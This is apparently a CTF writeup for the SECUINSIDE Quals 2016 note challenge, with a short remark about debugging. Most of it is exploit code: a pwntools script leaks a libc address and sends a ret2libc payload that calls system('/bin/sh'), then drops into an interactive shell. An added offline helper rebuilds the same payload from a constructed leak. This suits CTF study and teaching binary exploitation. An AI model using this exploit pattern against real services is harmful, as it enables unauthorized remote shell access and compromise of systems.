cdor1's lab
SECUINSIDE Quals 2016 noted
Notes: this was a problem where I spent a lot of time debugging to find a libc leak vector.
Always make debugging a habit.
from pwn import *

s = remote('localhost', 4000)

def register(id, password):
    print(s.recvuntil(b'3) Exit'))
    s.sendline(b'2')
    print(s.recvuntil(b'id : '))
    s.sendline(id)
    print(s.recvuntil(b'pw : '))
    s.sendline(password)

def login(id, password):
    print(s.recvuntil(b'3) Exit'))
    s.sendline(b'1')
    print(s.recvuntil(b'id : '))
    s.sendline(id)
    print(s.recvuntil(b'pw : '))
    s.sendline(password)

def create_note(title):
    print(s.recvuntil(b'Menu'))
    s.sendline(b'2')
    print(s.recvuntil(b'title : '))
    s.sendline(title)
    print(s.recvuntil(b'filedata length : '))
    s.sendline(b'-1')          # data length of -1, as the exploit sends it
    print(s.recvuntil(b'password : '))
    s.sendline(b"")            # empty note password

def edit_note(title):
    print(s.recvuntil(b'8) Logout'))
    s.sendline(b'4')
    print(s.recvuntil(b'title : '))
    s.sendline(title)
    print(s.recvuntil(b'password : '))
    s.sendline(b"")
    print(s.recvuntil(b'original data : '))
    # The echoed "original data" is 0x4cc bytes of note content followed by
    # a libc pointer: skip the content and take the next dword as the leak.
    print(s.recv(0x4cc))
    base = u32(s.recv(4)) - 0x18637          # leaked pointer -> libc base
    binsh = base + 0x15909f                  # "/bin/sh" in the remote's libc
    system_addr = base + 0x3a920             # system() in the remote's libc
    log.info("base : " + hex(base))
    log.info("/bin/sh : " + hex(binsh))
    log.info("system : " + hex(system_addr))
    # New note data: filler up to the saved return address, then a classic
    # 32-bit ret2libc frame: system(), a dummy return address for system()
    # itself, and the pointer to "/bin/sh" as system()'s argument.
    payload = b"A" * 0x48c
    payload += p32(system_addr)
    payload += b'AAAA'
    payload += p32(binsh)
    s.sendline(payload)
    print(s.recvuntil(b'3) Exit'))

register(b'cdor1', b'cdor1')
login(b'cdor1', b'cdor1')
create_note(b'a')
edit_note(b'a')
s.interactive()
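The leak-to-payload step in the script above is where a single wrong offset costs hours of debugging. The following is an added, offline example (not part of the original writeup, and not the author's code): it reproduces the script's arithmetic with the standard library only and adds the sanity check a practitioner wants before firing the payload at a live target. A libc base derived from a leaked pointer must be page-aligned; if it is not, the leak offset or the assumed libc build is wrong. The offsets (0x18637, 0x3a920, 0x15909f) and the 0x4cc/0x48c layout are the writeup's values for the remote libc; the sample leak bytes and the base address used in `demo()` are constructed for the example.

```python
import struct

# Constants as used by the writeup's exploit (remote libc offsets and layout).
LEAK_SKIP  = 0x4cc      # bytes of note content echoed before the leaked pointer
LEAK_OFF   = 0x18637    # leaked pointer minus libc base
SYSTEM_OFF = 0x3a920    # offset of system() in that libc
BINSH_OFF  = 0x15909f   # offset of the "/bin/sh" string in that libc
RET_PAD    = 0x48c      # filler bytes up to the saved return address


def p32(v):
    """Pack a 32-bit little-endian value (what pwntools' p32 does by default)."""
    return struct.pack('<I', v & 0xffffffff)


def u32(b):
    """Unpack a 32-bit little-endian value."""
    return struct.unpack('<I', b)[0]


def libc_base_from_leak(echoed, skip=LEAK_SKIP, leak_off=LEAK_OFF):
    """Extract the leaked pointer from the echoed data and derive libc base.

    Raises ValueError if too little data was echoed or the computed base is
    not page-aligned. A misaligned base almost always means the leak offset
    (or the assumed libc build) is wrong, which is cheaper to catch here than
    by watching the target crash.
    """
    if len(echoed) < skip + 4:
        raise ValueError('echo too short: %d bytes' % len(echoed))
    leaked = u32(echoed[skip:skip + 4])
    base = leaked - leak_off
    if base & 0xfff:
        raise ValueError('libc base 0x%x is not page-aligned; check the leak offset' % base)
    return base


def build_ret2libc(base, pad=RET_PAD, system_off=SYSTEM_OFF, binsh_off=BINSH_OFF):
    """Classic 32-bit ret2libc frame: [pad][system][fake ret][&"/bin/sh"]."""
    return (b'A' * pad
            + p32(base + system_off)    # overwrites the saved return address
            + b'AAAA'                   # return address for system() itself (unused)
            + p32(base + binsh_off))    # first argument to system()


def demo():
    """Run the pipeline on a constructed leak instead of a live service."""
    fake_base = 0xf7e00000                     # constructed, page-aligned
    echoed = b'\x00' * LEAK_SKIP + p32(fake_base + LEAK_OFF) + b'trailing junk'
    base = libc_base_from_leak(echoed)
    payload = build_ret2libc(base)
    return base, payload


if __name__ == '__main__':
    base, payload = demo()
    print('libc base : 0x%x' % base)
    print('system    : 0x%x' % (base + SYSTEM_OFF))
    print('/bin/sh   : 0x%x' % (base + BINSH_OFF))
    print('payload   : %d bytes' % len(payload))
```

In the live exploit, `libc_base_from_leak` would be fed the bytes read after `original data : ` and `build_ret2libc` would produce what the script sends as the new note data; keeping both as pure functions lets the layout be checked against a known base before touching the remote.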